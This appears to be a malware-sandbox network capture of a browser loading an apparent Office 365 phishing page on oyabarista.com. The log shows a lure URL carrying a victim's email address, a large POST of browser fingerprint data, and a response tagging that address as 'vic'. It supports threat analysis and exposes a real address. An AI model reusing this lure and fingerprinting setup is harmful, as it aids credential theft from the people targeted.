                                                        2025-03-27 13:41:19 UTC1369INData Raw: 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61
                                                        Data Ascii: color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.ha
                                                        2025-03-27 13:41:19 UTC1369INData Raw: 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                        Data Ascii: an-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549732104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:19 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:19 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:19 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor
                                                        2025-03-27 13:41:25 UTC802INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9b1DBL%2BoRLQuj76kUBChlHqodhzu33nsJy96qS13MsH8VZV9xjV9Qw%2Bg9Oelg8E5yqs%2Fd70zOz0seRAEhCWNTDxcXT19wIhgvwBQJaihc3MlLPhFAgm%2F80oUOM0aP3RuYvKdrHs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4dff1d610c7a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83503&min_rtt=83470&rtt_var=17658&sent=65&recv=153&lost=0&retrans=0&sent_bytes=2832&recv_bytes=149039&delivery_rate=36577&cwnd=252&unsent_bytes=0&cid=9a98f7a1888cea40&ts=5349&x=0"
                                                        2025-03-27 13:41:25 UTC567INData Raw: 33 36 39 62 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 51 54 42 4e 52 45 31 35 54 55 52 4a 4d 56 5a 55 53 54 56 4e 52 45 31 33 54 6b 52 42 65 67 3d 3d 27 20 76 69 63 3d 27 69 6e 66 6f 40 6b 6f 73 74 61 6c 2e 63 6f 6d 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56
                                                        Data Ascii: 369b<!DOCTYPE html><html id='html' sti='VlZORlVqQTBNRE15TURJMVZUSTVNRE13TkRBeg==' vic='info@kostal.com' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.54973435.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:19 UTC547OUTOPTIONS /report/v4?s=1U%2Bk9gUniMBmSCvMHGoFCfN3uCbfV2pr7qw8OajNonIyprtF1UYWICfL7KCAAYXomRfuWcgjDJayA0yM0VupPPpSt20FjvJY16arwC%2FPXr4ho20eT6lp54qNsJB7abZW2qyAVDk%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://www.oyabarista.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:20 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: OPTIONS, POST
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Thu, 27 Mar 2025 13:41:19 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.54973535.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:20 UTC522OUTPOST /report/v4?s=1U%2Bk9gUniMBmSCvMHGoFCfN3uCbfV2pr7qw8OajNonIyprtF1UYWICfL7KCAAYXomRfuWcgjDJayA0yM0VupPPpSt20FjvJY16arwC%2FPXr4ho20eT6lp54qNsJB7abZW2qyAVDk%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 533
                                                        Content-Type: application/reports+json
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:20 UTC533OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 37 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 79 61 62 61 72 69 73 74 61 2e 63 6f 6d 2f 6e 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 32 35 76 62 53 5a 79 59 57 35 6b 50 55 35 49 54 6e 56 56 4d 6d 4d 39 4a 6e 56 70 5a 44 31 56 55 30 56 53 4d 44 51 77 4d 7a 49 77 4d 6a 56 56 4d 6a 6b 77 4d 7a 41 30 4d 44 4d 3d 4e 30 31 32 33 4e 69 6e 66 6f 40 6b 6f 73 74 61 6c 2e 63 6f 6d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31
                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":1371,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com","sampling_fraction":1
                                                        2025-03-27 13:41:20 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Thu, 27 Mar 2025 13:41:20 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.549741104.17.24.144436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:25 UTC621OUTGET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:25 UTC947INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:25 GMT
                                                        Content-Type: text/css; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: W/"623a082a-4ef8"
                                                        Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 23210
                                                        Expires: Tue, 17 Mar 2026 13:41:25 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4Ro817c28y5s1t7ZPAK7Z71ADvy7r%2F8zUliH3OMC%2F%2FNP5jY2QAJ2XFEvsI4uiHVC9NOnxzAQNKEky77cADYvKzvXOUpT0xRXRP%2BITrXUzO75IsjBeQ7lm9luNvMM3%2BqlxYXujnl"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e23fd1118d0-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:25 UTC422INData Raw: 37 62 66 62 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 31 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                        Data Ascii: 7bfb/*! * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
